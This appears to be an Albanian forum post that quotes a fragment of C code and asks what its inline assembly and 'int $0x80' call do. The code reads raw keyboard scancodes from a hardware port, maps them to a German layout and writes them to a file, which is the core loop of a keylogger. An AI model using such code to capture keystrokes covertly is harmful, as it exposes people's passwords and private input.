asm("inb %%dx,%%al;":"=a"(prm):"a"(0),"d"(kp));
switch(prm){
case(2) : prm ='1' ;break;case(3) : prm ='2';break;
case(4) : prm ='3' ;break;case(5) : prm ='4';break;
case(6) : prm ='5' ;break;case(7) : prm ='6';break;
case(8) : prm ='7' ;break;case(9) : prm ='8';break;
case(10) : prm ='9' ;break;case(11) : prm ='0';break;
case(12) : prm ='ß' ;break;case(13) : prm ='´';break;
case(14) : prm ='\b';break;case(16) : prm ='q';break;
case(17) : prm ='w' ;break;case(18) : prm ='e';break;
case(19) : prm ='r' ;break;case(20) : prm ='t';break;
case(21) : prm ='z' ;break;case(22) : prm ='u';break;
case(23) : prm ='i' ;break;case(24) : prm ='o';break;
case(25) : prm ='p' ;break;case(26) : prm ='ü';break;
case(27) : prm ='+' ;break;case(28) : prm ='\n';break;
case(30) : prm ='a' ;break;case(31) : prm ='s';break;
case(32) : prm ='d' ;break;case(33) : prm ='f';break;
case(34) : prm ='g' ;break;case(35) : prm ='h';break;
case(36) : prm ='j' ;break;case(37) : prm ='k';break;
case(38) : prm ='l' ;break;case(39) : prm ='ö';break;
case(40) : prm =39 ;break;case(41) : prm =96 ;break;
case(43) : prm =92 ;break;case(44) : prm ='y';break;
case(45) : prm ='x' ;break;case(46) : prm ='c';break;
case(47) : prm ='v' ;break;case(48) : prm ='b';break;
case(49) : prm ='n' ;break;case(50) : prm ='m';break;
case(51) : prm =180 ;break;case(52) : prm =46 ;break;
case(53) : prm ='-' ;break;case(57) : prm =32 ;break;
default : prm =0 ;break;}
if(prm != dm)
write(fd,&prm,1);
asm("int $0x80"::"a"(162),"b"(ts),"c"(0));}
close(fd);}

Pjesen me te madhe te ketij kodi e kuptoj pervec kodit asm() pra pjeses ne assembler edhe se di pak nga ajo gjuhe ketu as qe po e marr vesh.Pra pak a shum therritet nje int nje funksion ose call, por cfar funksioni ka? Hajt pra ta diskutojme..